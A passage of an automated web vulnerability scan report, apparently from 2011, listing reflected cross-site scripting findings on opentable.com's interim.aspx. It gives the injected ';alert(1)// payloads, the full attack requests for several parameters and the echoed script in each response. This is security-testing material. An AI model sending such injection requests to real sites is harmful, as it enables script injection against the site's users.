Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMcf00e';alert(1)//25a9e3f968c&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

3.2. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c13'%3balert(1)//61446a4a109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c13';alert(1)//61446a4a109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&80c13'%3balert(1)//61446a4a109=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a04&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&80c13';alert(1)//61446a4a109=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...

3.3. http://www.opentable.com/interim.aspx [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54687'%3balert(1)//b64a7ba4ada was submitted in the p parameter. This input was echoed as 54687';alert(1)//b64a7ba4ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=254687'%3balert(1)//b64a7ba4ada&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:52 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a52&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=2&vbefreg=2&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=254687';alert(1)//b64a7ba4ada&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

3.4. http://www.opentable.com/interim.aspx [restref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dcd9'%3balert(1)//489de1fe41b was submitted in the restref parameter. This input was echoed as 8dcd9';alert(1)//489de1fe41b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=908dcd9'%3balert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a48; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=908dcd9';alert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...

3.5. http://www.opentable.com/interim.aspx [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51fe9'%3balert(1)//74d3d82061 was submitted in the rid parameter. This input was echoed as 51fe9';alert(1)//74d3d82061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=9051fe9'%3balert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
